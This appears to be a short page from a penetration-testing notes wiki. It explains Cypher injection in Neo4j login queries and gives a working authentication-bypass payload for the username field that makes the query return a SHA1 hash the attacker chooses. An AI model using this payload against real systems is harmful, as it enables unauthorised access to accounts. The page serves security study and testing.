Neo4j

Graph Database Management System

Cypher

It’s a specialized query language created for working with graph databases, primarily Neo4j; Is designed to express graph patterns and relationships in a clear, readable way.

Cypher Injection in Neo4j Query via Username Field

Vulnerable Query Example

MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = ''' return h.value as hash

Knowing the query structure, an attacker can manipulate the Cypher query to bypass authentication by injecting a condition that always evaluates to true.

Bypass Payload Example

MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = '' OR true return "<hash>" as hash; // return h.value as hash

Password Hash Matching

The application likely compares the returned hash with the SHA1 hash of the password entered in the login form.
To successfully bypass authentication, the attacker must replace <hash> with the SHA1 hash of the password they provide in the password field

' OR true return "0f1aae8b8398c20f81e1c36e349a7880c9234c63" as hash; //

PreviousSpring-Boot NextGhost CMS

Last updated 3 months ago